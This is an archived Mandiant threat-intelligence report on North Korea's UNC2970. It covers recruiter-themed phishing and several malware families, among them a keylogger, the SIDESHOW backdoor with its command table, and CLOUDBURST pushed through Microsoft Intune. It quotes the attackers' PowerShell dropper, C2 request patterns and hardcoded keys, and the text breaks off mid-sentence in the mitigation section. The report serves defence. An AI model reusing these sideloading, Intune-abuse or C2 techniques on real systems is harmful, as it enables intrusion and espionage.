{ "id": "9b940df3-b0b2-4ba7-99cd-dd0346b085dd", "created_at": "2026-04-06T00:22:19.773829Z", "updated_at": "2026-04-10T03:38:20.450998Z", "deleted_at": null, "sha1_hash": "2a3132b356393fb5ac433f1b17f2d59aff8341d2", "title": "Stealing the LIGHTSHOW (Part One) — North Korea's UNC2970 | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 8306611, "plain_text": "Stealing the LIGHTSHOW (Part One) — North Korea's UNC2970\r\n| Mandiant\r\nBy Mandiant\r\nPublished: 2023-03-09 · Archived: 2026-04-05 13:21:31 UTC\r\nWritten by: Mandiant Intelligence and Consulting\r\nSince June 2022, Mandiant has been tracking a campaign targeting Western Media and Technology companies\r\nfrom a suspected North Korean espionage group tracked as UNC2970. In June 2022, Mandiant Managed Defense\r\ndetected and responded to an UNC2970 phishing campaign targeting a U.S.-based technology company. During\r\nthis operation, Mandiant observed UNC2970 leverage three new code families: TOUCHMOVE, SIDESHOW, and\r\nTOUCHSHIFT. Mandiant suspects UNC2970 specifically targeted security researchers in this operation.\r\nFollowing the identification of this campaign, Mandiant responded to multiple UNC2970 intrusions targeting U.S.\r\nand European Media organizations through spear-phishing that used a job recruitment theme and demonstrated\r\nadvancements in the groups ability to operate in cloud environments and against Endpoint Detection and\r\nResponse (EDR) tools.\r\nUNC2970 is suspected with high confidence to be UNC577, also known as Temp.Hermit. UNC577 is a cluster of\r\nNorth Korean cyber activity that has been active since at least 2013. The group has significant malware overlaps\r\nwith other North Korean operators and is believed to share resources, such as code and complete malware tools\r\nwith other distinct actors. While observed UNC577 activity primarily targets entities in South Korea, it has also\r\ntargeted other organizations worldwide.\r\nUNC2970 has historically targeted organizations with spear phishing emails containing a job recruitment theme.\r\nThese operations have multiple overlaps with public reporting on “Operation Dream Job” by Google TAG,\r\nProofpoint, and ClearSky.\r\nUNC2970 has recently shifted to targeting users directly on LinkedIn using fake accounts posing as recruiters.\r\nUNC2970 maintains an array of specially crafted LinkedIn accounts based on legitimate users. These accounts are\r\nwell designed and professionally curated to mimic the identities of the legitimate users in order to build rapport\r\nand increase the likelihood of conversation and interaction. UNC2970 uses these accounts to socially engineer\r\ntargets into engaging over WhatsApp, where UNC2970 will then deliver a phishing payload either to a target’s\r\nemail, or directly over WhatsApp. UNC2970 largely employs the PLANKWALK backdoor during phishing\r\noperations as well as other malware families that share code with multiple tools leveraged by UNC577. Mandiant\r\nrecently published a blog post detailing UNC2970 activity that was identified by Mandiant Managed Defense\r\nduring proactive threat hunting. This activity was initially clustered as UNC4034 but has since been merged into\r\nUNC2970 based on multiple infrastructure, tooling, and tactics, techniques, and procedures (TTP) overlaps.\r\nWhen you're done reading this post, don't forget to check out part two on LIGHTSHIFT and LIGHTSHOW.\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 1 of 33\n\nSummary\r\nIn June 2022, Mandiant Managed Defense detected and responded to an UNC2970 phishing campaign targeting a\r\nU.S.-based technology company. During this operation, Mandiant observed UNC2970 leverage three new code\r\nfamilies: TOUCHMOVE, SIDESHOW, and TOUCHSHIFT. Mandiant suspects UNC2970 specifically targeted\r\nsecurity researchers in this operation. Following the identification of this campaign, Mandiant responded to\r\nmultiple UNC2970 intrusions targeting U.S. and European Media organizations through spear-phishing that used a\r\njob recruitment theme.\r\nInitial Access\r\nWhen conducting phishing operations, UNC2970 engaged with targets initially over LinkedIn masquerading as\r\nrecruiters. Once UNC2970 contacts a target, they would attempt to shift the conversation to WhatsApp, where\r\nthey would continue interacting with their target before sending a phishing payload that masqueraded as a job\r\ndescription. In at least one case, UNC2970 continued interacting with a victim even after the phishing payload\r\nwas executed and detected, asking for screenshots of the detection.\r\nThe phishing payloads primarily utilized by UNC2970 are Microsoft Word documents embedded with macros to\r\nperform remote-template injection to pull down and execute a payload from a remote command and control (C2).\r\nMandiant has observed UNC2970 tailoring the fake job descriptions to specific targets.\r\nFigure 1: UNC2970 lure document\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 2 of 33\n\nThe C2 servers utilized by UNC2970 for remote template injection have primarily been compromised WordPress\r\nsites, a trend observed in other UNC2970 code families as well as those used by other DPRK groups. At the time\r\nof analysis, the remote template was no longer present on the C2, however following this phishing activity,\r\nMandiant identified it beaconing to a C2 associated with PLANKWALK.\r\nIn the most recent UNC2970 investigation, Mandiant observed the group returning to WhatsApp to engage their\r\ntargets. This activity overlaps with a recent blog post by MSTIC on operations from ZINC, as well as the\r\npreviously mentioned Mandiant blog post from July 2022.\r\nThe ZIP file delivered by UNC2970 contained what the victim thought was a skills assessment test for a job\r\napplication. In reality, the ZIP contained an ISO file, which included a trojanized version of TightVNC that\r\nMandiant tracks as LIDSHIFT. The victim was instructed to run the TightVNC application which, along with the\r\nother files, are named appropriately to the company the victim had planned to take the assessment for.\r\nIn addition to functioning as a legitimate TightVNC viewer, LIDSHIFT contained multiple hidden features. The\r\nfirst was that upon execution by the user, the malware would send a beacon back to its hardcoded C2; the only\r\ninteraction this needed from the user was the launching of the program. This lack of interaction differs from what\r\nMSTIC observed in their recent blog post. The initial C2 beacon from LIDSHIFT contains the victim’s initial\r\nusername and hostname.\r\nLIDSHIFT’s second capability is to reflectively inject an encrypted DLL into memory. The injected DLL is a\r\ntrojanized Notepad++ plugin that functions as a downloader, which Mandiant tracks as LIDSHOT. LIDSHOT is\r\ninjected as soon as the victim opens the drop down inside of the TightVNC Viewer application. LIDSHOT has two\r\nprimary functions: system enumeration and downloading and executing shellcode from the C2.\r\nLIDSHOT sends the following information back to its C2:\r\nComputer Name\r\nProduct name as recorded in the following registry keySOFTWARE\\\\Microsoft\\\\Windows\r\nNT\\\\CurrentVersion\\\\ProductName\r\nIP address\r\nProcess List with User and Session ID associate per process\r\nEstablish Foothold\r\nIn multiple investigations, Mandiant has observed UNC2970 deploy PLANKWALK to establish footholds within\r\nenvironments. PLANKWALK is a backdoor written in C++ that communicates over HTTP and utilizes multiple\r\nlayers of DLL sideloading to execute an encrypted payload. PLANKWALK is initially executed through a\r\nlauncher that will import and execute a second stage launcher expected to be on disk.\r\nObserved First Stage Launcher names:\r\ndestextapi.dll\r\nmanextapi.dll\r\npathextapi.dll\r\npreextapi.dll\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 3 of 33\n\nWbemcomn.dll\r\nOnce loaded and executed, the secondary launcher will attempt to decrypt and execute an encrypted\r\nPLANKWALK sample on disk that matches the following pattern:\r\nC:\\ProgramData\\Microsoft\\Vault\\cache\u003cthree numerical digits\u003e.db\r\nOnce executed, PLANKWALK will decrypt an on-host encrypted configuration file that contains the C2 for the\r\nbackdoor. The C2 for PLANKWALK has largely been co-opted by legitimate WordPress sites.\r\nFollowing the deployment of PLANKWALK, Mandiant observed UNC2970 leverage a wide variety of additional\r\ntooling, including Microsoft InTune to deploy a shellcode downloader.\r\nTool Time: Kim “The Toolman” Taylor\r\nDuring their operations, Mandiant has observed UNC2970 use a wide range of custom, post-exploitation tooling\r\nto achieve their goals. One of UNC2970's go-to tools has been a dropper tracked as TOUCHSHIFT.\r\nTOUCHSHIFT allows UNC2970 to employ follow-on tooling that range from keyloggers and screenshot utilities,\r\nto full featured backdoors.\r\nTOUCHSHIFT\r\nTOUCHSHIFT is a malicious dropper that masquerades as mscoree.dll or netplwix.dll . TOUCHSHIFT is\r\ntypically created in the same directory and simultaneously as a legitimate copy of a Windows binary.\r\nTOUCHSHIFT leverages DLL Search Order Hijacking to use the legitimate file to load and execute itself.\r\nTOUCHSHIFT has been observed containing one to two various payloads which it executes in-memory. Payloads\r\nthat have been seen include TOUCHSHOT, TOUCHKEY, HOOKSHOT, TOUCHMOVE, and SIDESHOW.\r\nTo appear legitimate, the file uses over 100 exports that match common system export names. However, the\r\nmajority all point to the same empty function. The malicious code has been seen located in exports\r\nLockClrVersion or UsersRunDllW in different instances.\r\nFigure 2: Malicious export alongside several of the dummy exports\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 4 of 33\n\nWhen TOUCHSHIFT contains a second payload, it takes a single character command line option as its first\r\nargument to determine which of the two payloads to execute.\r\nFigure 3: Checking command line options\r\nTo unpack its payload(s), TOUCHSHIFT generates a decryption key by XOR encoding its second argument and\r\nthe first 16 characters of the legitimate executable’s file name.\r\nFor example, in one instance Mandiant observed the arguments -CortanaUIFilter , XOR encoded with the\r\nhardcoded key 009WAYHb90687PXkS , and printfilterpipel , which was XOR encoded with the hardcoded key\r\n.sV%58\u0026.lypQ[$= and was loaded by the file printfilterpipelinesvc.exe . In another instance, the argument\r\nused was --forkavlauncher and the loading file was C:\\windows\\Branding\\Netplwiz.exe .\r\nOnce the code is unpacked, it is then loaded into a memory location created by a call to VirtualAlloc and\r\nexecuted from there.\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 5 of 33\n\nFigure 4: Beginning of unpacked payload in memory\r\nOnce the payload(s) has/have been executed, the main portion of TOUCHSHIFT will sleep for a period of time\r\nallowing the payload(s) to continue executing.\r\nTOUCHSHIFT-ing into Gear — Follow on payloads\r\nTOUCHSHOT\r\nTOUCHSHOT takes screenshots of the system on which it is running and saves them to a file to be retrieved by\r\nthe threat actor at a later time. TOUCHSHOT is configured to take a screenshot every three seconds, and then uses\r\nZLIB to compress the images. The compressed data is then appended to a file that it creates and continues\r\nappending new screenshots to this file until the file reaches five megabytes in size, at which point it will create a\r\nnew file with the same naming convention. TOUCHSHOT was seen embedded in the same instance of\r\nTOUCHSHIFT as TOUCHKEY (discussed later in the post).\r\nTOUCHSHOT will create a file in the C:\\Users\\{user}\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\\r\ndirectory, and will name the file ~DM{####}P.dat , where the four numbers are pseudo-randomly generated. Once\r\nTOUCHSHOT has generated the file name, it attempts to create a handle to the file. If the return value indicates\r\nthat the file does not exist, it will then create the file. This check is performed as part of a loop that continues until\r\na new file needs to be created. After each iteration of the loop, TOUCHSHOT will then take a screenshot, which is\r\nappended to the staging file.\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 6 of 33\n\nFigure 5: Generation of the directory path\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 7 of 33\n\nFigure 6: Generation of file name with pseudo-random numbers\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 8 of 33\n\nFigure 7: Creating a handle to the file or creating it\r\nFigure 8: Taking a screenshot\r\nTOUCHKEY\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 9 of 33\n\nTOUCHKEY is a keylogger that captures keystrokes and clipboard data, both of which are encoded with a single-byte XOR and saved to a file. As with TOUCHSHOT, these files need to be acquired by the threat actor through\r\nadditional means.\r\nFigure 9: XOR’ing data with byte 0x62 before writing to the staging file\r\nTOUCHKEY creates two files in the C:\\Users\\\r\n{user}\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\ directory. The file name Normal.dost is used for\r\nstoring the captured keystrokes, while the file name Normal.docb is used for the clipboard data. The full paths\r\nare then passed into their own thread, where the keystrokes or clipboard data will be captured and appended to\r\ntheir respective files.\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 10 of 33\n\nFigure 10: Path generation for the staging files\r\nFigure 11: Adding file names to the full path and creating the threads\r\nIn one of the created threads, TOUCHKEY will open the clipboard and grab the data that is stored within it. In the\r\nother thread, TOUCHKEY will set a hook into the keyboard, and record any keys that are pressed.\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 11 of 33\n\nFigure 12: Capturing the clipboard data\r\nFigure 13: Capturing keystrokes\r\nHOOKSHOT\r\nHOOKSHOT is a tunneler that leverages a statically linked implementation of OpenSSL to communicate back to\r\nits C2. While it connects over TCP, it does not make use of a client certificate for encryption.\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 12 of 33\n\nFigure 14: Example of OpenSSL statically linked in the file\r\nHOOKSHOT takes an encoded argument containing two IP and port pairs, which it will leverage for\r\ncommunicating with its C2.\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 13 of 33\n\nFigure 15: Separating IP’s and ports\r\nHOOKSHOT will then create a socket using these two IP addresses, and tunnel traffic across them utilizing\r\nTLSv1.0.\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 14 of 33\n\nFigure 16: Socket creation\r\nTOUCHMOVE\r\nTOUCHMOVE is a loader that decrypts a configuration file and a payload, both of which must be on disk, and\r\nthen executes the payload. TOUCHMOVE generates an RC6 key to decrypt the two files by querying the system’s\r\nBIOS date, version, manufacturer, and product name. Once decrypted, the results are XOR encoded with a\r\nhardcoded key. If the generated RC6 key is incorrect, the configuration and payload files will not successfully\r\ndecrypt, indicating that UNC2970 compiles instances of TOUCHMOVE after having already conducted\r\nreconnaissance on the target victim system. Once the RC6 key is successfully generated, a handle is created to the\r\nconfiguration file, and the decryption process is conducted. If the configuration file is successfully decrypted, the\r\npayload’s full path is located within it, and the same decryption process then occurs on the payload. Following\r\nthis, the payload is executed.\r\nFigure 17: Bios query strings\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 15 of 33\n\nFigure 18: Creating a handle to the configuration file\r\nFigure 19: Creating a handle to the payload\r\nSIDESHOW\r\nSIDESHOW is a backdoor written in C/C++ that communicates via HTTP POST requests with its C2 server. The\r\nbackdoor is multi-threaded, uses RC6 encryption, and supports at least 49 commands, which can be seen in Table\r\n1. Capabilities include arbitrary command execution (WMI capable); payload execution via process injection;\r\nservice, registry, scheduled task, and firewall manipulation; querying and updating Domain Controller settings;\r\ncreating password protected ZIP files; and more. SIDESHOW does not explicitly establish persistence; however,\r\nbased on the multitude of supported commands it may be commanded to establish persistence.\r\nSIDESHOW derives a system-specific RC6 key using the same registry values as TOUCHMOVE and uses the\r\ngenerated key to decrypt the same configuration file from disk that TOUCHMOVE decrypted. The decrypted\r\nconfiguration file contains a list of C2 URLs to which SIDESHOW communicates using HTTP POST requests.\r\nSIDESHOW iterates this C2 URL list and attempts to authenticate to each C2 URL until it is successful. Once\r\nsuccessful, SIDESHOW enters a state of command processing and sends additional HTTP POST requests to\r\nretrieve commands. SIDESHOW attempts to use the system's default HTTP User-Agent string during C2\r\ncommunications; however, if not available it uses the hard-coded HTTP User-Agent string:\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/97.0.4692.99 Safari/537.36 Edg/97.0.1072.69\r\nWhen communicating to its C2 server via HTTP POST requests, SIDESHOW forms a URI parameter string\r\nconsisting of a mix of randomly selected and hard-coded URI parameters.\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 16 of 33\n\nAuthentication requests use the following URI parameter string format:\r\n1\u003cparam_1\u003e=\u003chex_seed\u003e\u0026\u003cparam_2\u003e=pAJ9dk4OVq85jxKWoNfw1AG2C\u0026\u003cparam_3\u003e=\r\n\u003c16_random_hex_chars\u003e\r\nThe first URI parameter value comes from SIDESHOW’s configuration and is used to seed the random function.\r\nThe second URI parameter value, pAJ9dk4OVq85jxKWoNfw1AG2C , is hardcoded and likely an authentication\r\ncredential.\r\nThe third URI parameter value, \u003c16_random_hex_chars\u003e , is a session identifier ( \u003csession_id\u003e ) used for future\r\ncommunications and consists of two subcomponents:\r\n1. \u003c8_random_hex_based_on_seed\u003e\r\n2. \u003c8_random_hex_based_on_tickcount\u003e\r\nThe first URI parameter's value, \u003chex_seed\u003e , is used as a random seed value to derive the first eight hexadecimal\r\ncharacters ( \u003c8_random_hex_based_on_seed\u003e ), whereas the last eight hexadecimal characters\r\n( \u003c8_random_hex_based_on_tickcount\u003e ) are derived using the CPU's current tick count as the random seed value.\r\nThis results in the value \u003c8_random_hex_based_on_seed\u003e being deterministic, while\r\n\u003c8_random_hex_based_on_tickcount\u003e is pseudo-random.\r\nThe following is an example authentication URI parameter string:\r\n1pguid=A59\u0026ssln=pAJ9dk4OVq85jxKWoNfw1AG2C\u0026cup2key=184B280E341AE63F\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 17 of 33\n\nFigure 20: Building of URI parameter string\r\nSIDESHOW parses the response and considers it a successful authentication if it contains the string \u003c!DOCTYPE\r\nhtml\u003e .\r\nCommand requests use the following URI parameter string format (notice that the \u003cparam_2\u003e and \u003cparam_3\u003e\r\nhave switched locations in the string).\r\n1\u003cparam_1\u003e=\u003c5_random_digits\u003e\u0026\u003cparam_3\u003e=2\u003csession_id\u003e\u0026\u003cparam_2\u003e=\u003c6_random_digits\u003e\r\nExample command URI parameter string:\r\n1other=37685\u0026session=2184B280E341AE63F\u0026page=593881\r\nSIDESHOW parses the command response body and extracts data following the string \u003c!DOCTYPE html\u003e .\r\nSIDESHOW then appears to Base64 decode and RC6 decrypt the extracted data. SIDESHOW responds to the\r\ncommands listed in Table 1 (commands are described on a best effort basis).\r\nFigure 21: Switch statement following parsing of command\r\nCommand\r\nID\r\nDescription\r\n00 Get lightweight system information and a few configuration details\r\n01 Enumerate drives and list free space\r\n02 List files in directory\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 18 of 33\n\n03 Execute arbitrary command via  CreateProccess()  and return output\r\n04\r\nLikely zip directory to create password protected ZIP file with\r\npassword  AtbsxjCiD2axc*ic[3\u003c/8Ad81!G./1kiThAfkgnw\r\n05 Download file to system\r\n06 Execute process\r\n07 Execute process and spoof parent process identifier (PID)\r\n08 Execute PE payload via process injection for specified PID\r\n09 Execute PE payload via loading into malware's memory space\r\n0A List running processes and loaded DLLs\r\n0B Terminate process\r\n0C Securely delete a file by first writing random data and then calling  DeleteFile()\r\n0D Connect to specified IP address and port -- use unknown\r\n0E Not implemented\r\n0F Set current directory\r\n10 Timestomp a file using another file's timestamp\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 19 of 33\n\n11 Update beacon interval\r\n12 Update beacon interval and save configuration to disk\r\n13 Clean up by securely deleting supporting files, registry values, services, and exit\r\n14 Load configuration from disk\r\n15 Update configuration and save to disk\r\n16 Get size of all files in a directory\r\n17 Get specified drive's free disk space\r\n18 Suspend a process\r\n19 Suspend a process\r\n1A Load DLL in another process\r\n1B Unload DLL in another process\r\n1C Copy file to another location\r\n1D Remove directory\r\n1E Move file to another location\r\n1F Execute shellcode payload via process injection for specified PID\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 20 of 33\n\n20 Execute shellcode payload via loading into malware's memory space\r\n21 Get networking configuration information\r\n22 Query or modify settings on a Windows Domain Controller\r\n23 Query or modify system's firewall settings\r\n24 List active TCP and UDP connections\r\n25 Ping a remote system via ICMP requests -- usage unknown\r\n26 Query or modify system's registry\r\n27 Query or modify system's services\r\n28 Ping a remote system via ICMP requests -- usage unknown\r\n29 Get domain and user account name for which the malware's process is running under\r\n2A Execute WMI command\r\n2B Resolve domain name via DNS query\r\n2C Query or modify system's scheduled tasks\r\n2D Get heavyweight system information\r\n2E Get networking interface information\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 21 of 33\n\n2F Create directory\r\n30 List files in directory\r\nTable 1: Commands supported by SIDESHOW\r\nReaching for the Clouds: Intune with CLOUDBURST\r\nIn at least one investigation, Mandiant identified the threat actors leveraging Microsoft Intune, Microsoft's\r\nendpoint management solution, to deploy malware to hosts in the environment. Mandiant suspects that this\r\nmethod of malware deployment was used due to the absence of a VPN solution for remote machines. In order to\r\nremotely execute code, the attackers leveraged the Microsoft Intune management extension (IME) to upload\r\ncustom PowerShell scripts containing malicious code to various hosts in the client environment. While conducting\r\nforensic analysis on a host, Mandiant identified the following Microsoft IME related PowerShell script command\r\nline arguments:\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -\r\nexecutionPolicy bypass -file \"C:\\Program Files (x86)\\Microsoft Intune Management\r\nExtension\\Policies\\Scripts\\42fb3cca-48dd-4412-a11a-245384544402_f391eded-82d3-4506-8bf4-9213f6f4d586.ps1\r\nAt the time of analysis, Mandiant was unable to acquire the PS1 file itself, however; Mandiant was able to acquire\r\na full copy of the PS1 file from local Microsoft IME logs identified on a host, located at:\r\nC:\\ProgramData\\Microsoft\\IntuneManagementExtension\\Logs\\IntuneManagementExtension-YYYYMMDD-HHMMSS.log\r\nThe entry in the local logs appeared as follows:\r\n\u003c![LOG[[PowerShell] response payload is [{\"AccountId\":\"[userGUID]\",\"PolicyId\":\"f391eded-82d3-4506-8bf4-\r\n9213f6f4d586\",\"PolicyType\":1,\"DocumentSchemaVersion\":\"1.0\",\"PolicyHash\":\"P23cVfMyHLECSGPt1T6YYcoxhCLWKS05jX5M\r\nukC3MIw=\",\"PolicyBody\":\"$EnModule = \\\"[Base64_encoded_CLOUDBURST_payload]\"\\r\\n$DeModule =\r\n[System.Convert]::FromBase64CharArray($EnModule, 0, $EnModule.Length)\\r\\nSet-Content\r\n\\\"C:\\\\ProgramData\\\\mscoree.dll\\\" -Value $DeModule -Encoding Byte\\r\\nCopy-Item\r\n\\\"C:\\\\Windows\\\\System32\\\\PresentationHost.exe\\\" -Destination \\\"C:\\\\ProgramData\\\"\\r\\nStart-Process -\r\nNoNewWindow -FilePath \\\"C:\\\\ProgramData\\\\PresentationHost.exe\\\" -ArgumentList \\\"-\r\nembeddingObject\\\"\\r\\n\",\"PolicyBodySize\":null,\"PolicyScriptParameters\":null,\"ContentSignature\":\"\r\n[Base64_encoded_signing_certificate]\",\"isTombStoned\":false,\"isRecurring\":false,\"isFullSync\":false,\"ExecutionCont\r\n\"InternalVersion\":1,\"EnforceSignatureCheck\":false,\"RunningMode\":1,\"RemediationScript\":null,\"RunRemediation\":fals\r\nRemediateScriptHash\":null,\"RemediationScriptParameters\":null,\"ComplianceRules\":null,\"ExecutionFrequency\":0,\"\r\nRetryCount\":0,\"BlockExecutionNotifications\":false,\"ModifiedTime\":null,\"Schedule\":null,\"IsFirstPartyScript\":false\r\n\"ScriptApplicabilityStateDueToAssignmentFilters\":null,\"AssignmentFilterIdToEvalStateMap\":{},\"HardwareConfigurati\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 22 of 33\n\nThe malicious PowerShell script was used to decode the Base64 encoded CLOUDBURST payload and drop it on\r\ndisk as  C:\\ProgramData\\mscoree.dll . The script would then write a copy\r\nof  C:\\Windows\\System32\\PresentationHost.exe  to  C:\\ProgramData  and execute it with the argument  -\r\nembeddingObject .  PresentationHost.exe  is a legitimate Windows binary used by UNC2970 to sideload\r\nCLOUDBURST.\r\nUpon execution,  PresentationHost.exe  would load the CLOUDBURST payload into memory. Upon further\r\nanalysis of the Microsoft IME endpoint logs, Mandiant identified a unique GUID,  f391eded-82d3-4506-8bf4-\r\n9213f6f4d586 , in the PolicyID field, which is a \"Unique identifier of the Policy in the data warehouse\". The\r\nIntune Data Warehouse provides insight and information about an enterprise mobile environment, such as\r\nhistorical Intune data and Intune data refreshed on a daily occurence. The identified GUID also matched the GUID\r\nof the PowerShell script file name and the GUID observed in an IME associated registry key.\r\nWhen reviewing the Intune Tenant admin Audit logs, Mandiant identified the same GUID under the ObjectID\r\nfield. The Intune Tenant audit logs shows records of activities that generate a change in Intune, including create,\r\nupdate (edit), delete, assign, and remote actions. The logs revealed that the threat actors used a previously\r\ncompromised account to perform a create, assign, patch, and finally a delete action of a Device Management\r\nScript, using the Target  Microsoft.Management.Services.Api.DeviceManagementScript  and the\r\nGroupID  f391eded-82d3-4506-8bf4-9213f6f4d586 .\r\nFurther analysis revealed that ObjectID GUIDs referenced in the Intune Tenant admin Audit logs maps to the ID\r\nof Mobile App assignment groups.\r\nAt the time of analysis, the GroupID  f391eded-82d3-4506-8bf4-9213f6f4d586 , was no longer present in the\r\nIntune Endpoint management admin center, and was likely deleted by the threat actors.\r\nIn order to determine malicious usage of Microsoft Intune, Mandiant performed the following analysis steps:\r\n1. Analyzed AzureAD sign-in logs for evidence of suspicious logons to the Microsoft Intune application\r\nAnalyzed Microsoft Intune audit logs for evidence of unexpected deployments and performed the\r\nfollowing:\r\nUtilized the GroupID GUID to search for the presence of the following endpoint artifacts:\r\n1. HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\ IntuneManagementExtension\\Policies\\\r\n\u003cUserGUID\u003e\\\u003csuspicious ObjectID GUID\u003e\r\n2. C:\\Program Files (x86)\\Microsoft Intune Management\r\nExtension\\ Policies\\Scripts\\\u003cUserGUID\u003e_\u003csuspicious ObjectID GUID\u003e.ps1\r\n2. For hosts that had the aforementioned artifacts, the following was performed:\r\nAcquired the PS1 file(s) and analyzed for malicious code\r\nPerformed traditional endpoint analysis\r\nMandiant tracks the malware being distributed via InTune as CLOUDBURST. CLOUDBURST is a downloader\r\nwritten in C that communicates via HTTP. The malware attempts to make itself look like a legitimate version\r\nof  mscoree.dll , but contains fake exports, the same way that TOUCHSHIFT uses fake exports. One variant of\r\nCLOUDBURST made use of legitimate open-source software that was added as exports, in addition to the fake\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 23 of 33\n\nexports. The actual export with malicious code is  CorExitProcess . The  CorExitProcess  export expects the\r\nsingle argument -embeddingObject.\r\nFigure 22: Comparing command line argument with -embeddingObject\r\nOnce the aforementioned command line argument has been verified, CLOUDBURST builds the domain as a stack\r\nstring, and sends out the two following requests to the C2 server:\r\nhxxps://[c2domain]/wp-content/plugins/contact.php?gametype=\r\n\u003crandom_dword\u003e\u0026type=O8Akm8aV09Nw412KMoWJd\r\nhxxps://[c2domain]/wp-content/plugins/contact.php?\r\ngametype=tennis\u0026type=k\u003crandom_dword\u003e\r\nFollowing the network connections, CLOUDBURST conducts a host survey, in which it will determine the\r\nProduct Name, Computer Name, and enumerate running processes.\r\nFigure 23: Calling functions to enumerate the host\r\nUpon completion of the host enumeration, CLOUDBURST then downloads and executes shellcode from the C2\r\nserver. At this time, Mandiant was unable to recover and identify the purpose of the shellcode downloaded by\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 24 of 33\n\nCLOUDBURST.\r\nFigure 24: Allocating and populating memory space, and executing the shellcode\r\nOutlook and Implications\r\nThe identified malware tools highlight continued malware development and deployment of new tools by\r\nUNC2970. Although the group has previously targeted defense, media, and technology industries, the targeting of\r\nsecurity researchers suggests a shift in strategy or an expansion of its operations. Technical indicators and the\r\ngroup’s TTPs link it to TEMP.Hermit, although this latest activity suggests the group is adapting their capabilities\r\nas more of their targets move to cloud services. To learn more about how UNC2970 further enabled its operations,\r\nplease see part two of our research.\r\nCampaign Tracking\r\nMandiant will continue to monitor UNC2970’s campaigns and intrusion operations and will provide notable and\r\ndynamic updates regarding changes in tactics and techniques, the introduction of tools with new capabilities, or\r\nthe use of new infrastructure to carry out their mission.\r\nFor more insights into how Mandiant tracks this and similar campaigns, see our Threat Campaigns feature\r\nwithin Mandiant Advantage Threat Intelligence.\r\nRecommended Mitigations\r\nHardening Azure AD and Microsoft Intune\r\nMandiant has observed UNC2970 leverage weak identity controls in Azure AD combined with Microsoft Intune’s\r\nendpoint management capabilities to effectively deploy malicious PowerShell scripts onto unsuspecting endpoints.\r\nIncreasing Azure AD identity protections and limiting access to Microsoft Intune is essential in mitigating the\r\nattacker activity observed by Mandiant. Organizations should consider implementing the following hardening\r\ncontrols:\r\nCloud-Only Accounts: Organizations should utilize cloud-only accounts for privileged access within Azure AD\r\n(e.g., Global Admins, Intune Administrator) and never assign privileged access to synced accounts from on-premises identity providers such as Active Directory. Additionally, admins should utilize a separate “daily-driver”\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 25 of 33\n\naccount for day-to-day activities such as sending email or web-browsing. Dedicated admin accounts should be\r\nutilized to carry out administrative functions only.\r\nEnforce Strong Multi-Factor Authentication Methods: Organizations should consider enforcing enhanced and\r\nphishing-resistant Multi-Factor Authentication (MFA) methods for all users and administrators. Weak MFA\r\nmethods commonly include SMS, Voice (phone call), OTPs, or Push notifications and should be considered for\r\nremoval. MFA enhancements for non-privileged users should include contextual information regarding the MFA\r\nrequest such as number-matching, application name, and geographic location. For privileged accounts, Mandiant\r\nrecommends the enforcement of hardware tokens or FIDO2 Security Keys as-well as requiring MFA per each\r\nsign-in regardless of location (e.g., Trusted Network, Corporate VPN). As an initial roll out for enhanced MFA\r\nmethods, organizations should focus on all accounts with administrative privileges in Azure AD. Microsoft\r\nhas additional information regarding contextual MFA settings.\r\nPrivileged Identity Management (PIM) Solution: Mandiant recommends that organizations consider utilizing a\r\nPIM solution. A PIM solution should include a Just-In-Time (JIT) access capability which will provide access\r\nwhen requested, for a specific duration of time, and should initiate an approval flow, prior to providing an account\r\naccess to a highly privileged role (e.g., Global Administrator or Intune Administrator).\r\nConditional Access Policies (CAPs) to Enforce Security Restrictions in Azure AD: A CAP allows\r\norganizations to set requirements for accessing cloud apps such as Intune, based on various conditions including\r\nlocation and device platform. Mandiant recommends that Organizations utilize CAPs to restrict Azure\r\nadministrative functions to only compliant and registered devices in Azure AD and only from a specific subset of\r\ntrusted IPs or ranges. Microsoft has more information on leveraging CAPs to access Cloud Apps.\r\nAzure Identity Protection: Azure Identity Protection is a security feature within Azure Active Directory that\r\nallows organizations to automate the detection and remediation of identity-based risks. Identity Protection\r\nanalyzes user account activity as-well as sign-in activity to identify potentially compromised accounts or\r\nunauthorized authentication requests. Identity Protection data can 